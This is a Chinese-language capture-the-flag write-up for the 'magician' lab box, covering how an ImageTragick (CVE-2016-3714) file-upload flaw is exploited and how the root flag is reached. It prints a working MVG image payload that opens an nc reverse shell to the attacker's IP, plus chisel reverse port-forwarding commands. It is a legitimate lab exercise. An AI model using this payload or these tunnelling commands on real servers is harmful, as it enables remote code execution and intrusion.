magician
CVE-2016–3714
This magical website lets you convert image file formats
0x01 信息收集
Nmap扫描端口开放服务,开放了21,8080,8081端口
根据靶场提示要把ip指向域名:magician
0x02 漏洞利用(CVE-2016–3714)
先访问21端口,有个匿名访问,被做了点手脚“延迟”。登录进去里面是空的,根据提示访问
https://imagetragick.com.
根据给的网站提示,这个靶场的利用点大概是:CVE-2016–3714
访问8081端口,这里有个文件上传。先上传一张正常的png图片
截个包看看,正常
网上的exp有很多,我试了这个
试了各种shell都弹不回来
github上找到一个EXP
修改成自己攻击的ip
push graphic-context
encoding "UTF-8"
viewbox 0 0 1 1
affine 1 0 0 1 0 0
push graphic-context
image Over 0,0 1,1 '|mkfifo /tmp/gjdpez; nc 10.10.48.172 8888 0</tmp/gjdpez | /bin/sh >/tmp/gjdpez 2>&1; rm /tmp/gjdpez '
pop graphic-context
pop graphic-context
成功弹回shell
0x03 ROOT Flag
成功读取了USER的Flag
接下来这个ROOT的Flag整我半天都没有进展。问下大佬叫我看本机端口
netstat -tulpn
我的天,之前都没有看这里的习惯。又学到了。
直接curl一下
是个网站,虽然可以直接curl请求上去。但是还是练练端口转发把
这边学大佬用的chisel这个转发工具。
wget 下载下来
用python把工具也传到目标机上
攻击机上执行:./chisel_1.7.6_linux_amd64 server --reverse --port 9001
目标机上执行:./chisel_1.7.6_linux_amd64 client 10.10.178.24:9001 R:9002:127.0.0.1:6666
把攻击机上的9002端口转发到目标机的6666端口上
访问该网站是个cat命令,直接读取root.txt,经过了base64编码
直接解码获得Flag